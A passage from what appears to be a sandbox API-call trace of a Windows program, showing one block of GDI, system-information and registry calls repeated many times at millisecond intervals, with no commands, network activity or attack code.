phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.662] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401d0 [0087.662] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401cd [0087.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095d [0087.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095e [0087.662] CombineRgn (hrgnDst=0x104095d, hrgnSrc1=0x630401d0, hrgnSrc2=0x650401cd, iMode=1) returned 1 [0087.662] CombineRgn (hrgnDst=0x104095e, hrgnSrc1=0x630401d0, hrgnSrc2=0x650401cd, iMode=4) returned 2 [0087.662] CreateSolidBrush (color=0xff) returned 0x210095c [0087.662] CreateSolidBrush (color=0xff0000) returned 0x110095f [0087.662] DeleteObject (ho=0x110095f) returned 1 [0087.662] DeleteObject (ho=0x650401cd) returned 1 [0087.662] DeleteObject (ho=0x630401d0) returned 1 [0087.662] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.662] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.662] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.662] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.662] BeginPath (hdc=0x0) returned 0 [0087.662] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.662] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.663] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.663] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.663] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401cd [0087.663] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401d0 [0087.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040960 [0087.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040961 [0087.663] CombineRgn (hrgnDst=0x1040960, hrgnSrc1=0x660401cd, hrgnSrc2=0x640401d0, iMode=1) returned 1 [0087.663] CombineRgn (hrgnDst=0x1040961, hrgnSrc1=0x660401cd, hrgnSrc2=0x640401d0, iMode=4) returned 2 [0087.663] CreateSolidBrush (color=0xff) returned 0x210095f [0087.663] CreateSolidBrush (color=0xff0000) returned 0x1100962 [0087.663] DeleteObject (ho=0x1100962) returned 1 [0087.663] DeleteObject (ho=0x640401d0) returned 1 [0087.663] DeleteObject (ho=0x660401cd) returned 1 [0087.663] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.663] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.663] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.663] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.663] BeginPath (hdc=0x0) returned 0 [0087.663] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.663] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.663] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.663] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.663] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401d0 [0087.663] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401cd [0087.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040963 [0087.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040964 [0087.663] CombineRgn (hrgnDst=0x1040963, hrgnSrc1=0x650401d0, hrgnSrc2=0x670401cd, iMode=1) returned 1 [0087.663] CombineRgn (hrgnDst=0x1040964, hrgnSrc1=0x650401d0, hrgnSrc2=0x670401cd, iMode=4) returned 2 [0087.663] CreateSolidBrush (color=0xff) returned 0x2100962 [0087.663] CreateSolidBrush (color=0xff0000) returned 0x1100965 [0087.664] DeleteObject (ho=0x1100965) returned 1 [0087.664] DeleteObject (ho=0x670401cd) returned 1 [0087.664] DeleteObject (ho=0x650401d0) returned 1 [0087.664] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.664] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.664] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.664] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.664] BeginPath (hdc=0x0) returned 0 [0087.664] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.664] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.664] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.664] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.664] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401cd [0087.664] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401d0 [0087.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040966 [0087.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040967 [0087.664] CombineRgn (hrgnDst=0x1040966, hrgnSrc1=0x680401cd, hrgnSrc2=0x660401d0, iMode=1) returned 1 [0087.664] CombineRgn (hrgnDst=0x1040967, hrgnSrc1=0x680401cd, hrgnSrc2=0x660401d0, iMode=4) returned 2 [0087.664] CreateSolidBrush (color=0xff) returned 0x2100965 [0087.664] CreateSolidBrush (color=0xff0000) returned 0x1100968 [0087.664] DeleteObject (ho=0x1100968) returned 1 [0087.664] DeleteObject (ho=0x660401d0) returned 1 [0087.664] DeleteObject (ho=0x680401cd) returned 1 [0087.664] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.664] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.664] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.664] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.664] BeginPath (hdc=0x0) returned 0 [0087.664] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.664] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.664] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.664] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.665] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401d0 [0087.665] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401cd [0087.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040969 [0087.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096a [0087.665] CombineRgn (hrgnDst=0x1040969, hrgnSrc1=0x670401d0, hrgnSrc2=0x690401cd, iMode=1) returned 1 [0087.665] CombineRgn (hrgnDst=0x104096a, hrgnSrc1=0x670401d0, hrgnSrc2=0x690401cd, iMode=4) returned 2 [0087.665] CreateSolidBrush (color=0xff) returned 0x2100968 [0087.665] CreateSolidBrush (color=0xff0000) returned 0x110096b [0087.665] DeleteObject (ho=0x110096b) returned 1 [0087.665] DeleteObject (ho=0x690401cd) returned 1 [0087.665] DeleteObject (ho=0x670401d0) returned 1 [0087.665] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.665] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.665] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.665] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.665] BeginPath (hdc=0x0) returned 0 [0087.665] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.665] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.665] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.665] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.665] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.665] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401cd [0087.665] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401d0 [0087.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096c [0087.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096d [0087.665] CombineRgn (hrgnDst=0x104096c, hrgnSrc1=0x6a0401cd, hrgnSrc2=0x680401d0, iMode=1) returned 1 [0087.665] CombineRgn (hrgnDst=0x104096d, hrgnSrc1=0x6a0401cd, hrgnSrc2=0x680401d0, iMode=4) returned 2 [0087.665] CreateSolidBrush (color=0xff) returned 0x210096b [0087.665] CreateSolidBrush (color=0xff0000) returned 0x110096e [0087.665] DeleteObject (ho=0x110096e) returned 1 [0087.665] DeleteObject (ho=0x680401d0) returned 1 [0087.665] DeleteObject (ho=0x6a0401cd) returned 1 [0087.665] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.665] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.666] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.666] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.666] BeginPath (hdc=0x0) returned 0 [0087.666] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.666] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.666] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.666] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.666] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.666] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401d0 [0087.666] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401cd [0087.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096f [0087.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040970 [0087.666] CombineRgn (hrgnDst=0x104096f, hrgnSrc1=0x690401d0, hrgnSrc2=0x6b0401cd, iMode=1) returned 1 [0087.666] CombineRgn (hrgnDst=0x1040970, hrgnSrc1=0x690401d0, hrgnSrc2=0x6b0401cd, iMode=4) returned 2 [0087.666] CreateSolidBrush (color=0xff) returned 0x210096e [0087.666] CreateSolidBrush (color=0xff0000) returned 0x1100971 [0087.666] DeleteObject (ho=0x1100971) returned 1 [0087.666] DeleteObject (ho=0x6b0401cd) returned 1 [0087.666] DeleteObject (ho=0x690401d0) returned 1 [0087.666] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.666] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.666] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.666] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.666] BeginPath (hdc=0x0) returned 0 [0087.666] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.666] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.666] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.666] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.666] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.667] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401cd [0087.667] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401d0 [0087.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040972 [0087.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040973 [0087.667] CombineRgn (hrgnDst=0x1040972, hrgnSrc1=0x6c0401cd, hrgnSrc2=0x6a0401d0, iMode=1) returned 1 [0087.667] CombineRgn (hrgnDst=0x1040973, hrgnSrc1=0x6c0401cd, hrgnSrc2=0x6a0401d0, iMode=4) returned 2 [0087.667] CreateSolidBrush (color=0xff) returned 0x2100971 [0087.667] CreateSolidBrush (color=0xff0000) returned 0x1100974 [0087.667] DeleteObject (ho=0x1100974) returned 1 [0087.667] DeleteObject (ho=0x6a0401d0) returned 1 [0087.667] DeleteObject (ho=0x6c0401cd) returned 1 [0087.667] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.667] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.667] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.667] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.667] BeginPath (hdc=0x0) returned 0 [0087.667] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.667] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.667] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.667] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.667] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.667] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401d0 [0087.667] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401cd [0087.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040975 [0087.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040976 [0087.667] CombineRgn (hrgnDst=0x1040975, hrgnSrc1=0x6b0401d0, hrgnSrc2=0x6d0401cd, iMode=1) returned 1 [0087.667] CombineRgn (hrgnDst=0x1040976, hrgnSrc1=0x6b0401d0, hrgnSrc2=0x6d0401cd, iMode=4) returned 2 [0087.667] CreateSolidBrush (color=0xff) returned 0x2100974 [0087.667] CreateSolidBrush (color=0xff0000) returned 0x1100977 [0087.667] DeleteObject (ho=0x1100977) returned 1 [0087.667] DeleteObject (ho=0x6d0401cd) returned 1 [0087.667] DeleteObject (ho=0x6b0401d0) returned 1 [0087.667] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.667] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.668] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.668] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.668] BeginPath (hdc=0x0) returned 0 [0087.668] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.668] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.668] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.668] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.668] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401cd [0087.668] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401d0 [0087.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040978 [0087.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040979 [0087.668] CombineRgn (hrgnDst=0x1040978, hrgnSrc1=0x6e0401cd, hrgnSrc2=0x6c0401d0, iMode=1) returned 1 [0087.668] CombineRgn (hrgnDst=0x1040979, hrgnSrc1=0x6e0401cd, hrgnSrc2=0x6c0401d0, iMode=4) returned 2 [0087.668] CreateSolidBrush (color=0xff) returned 0x2100977 [0087.668] CreateSolidBrush (color=0xff0000) returned 0x110097a [0087.668] DeleteObject (ho=0x110097a) returned 1 [0087.668] DeleteObject (ho=0x6c0401d0) returned 1 [0087.668] DeleteObject (ho=0x6e0401cd) returned 1 [0087.668] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 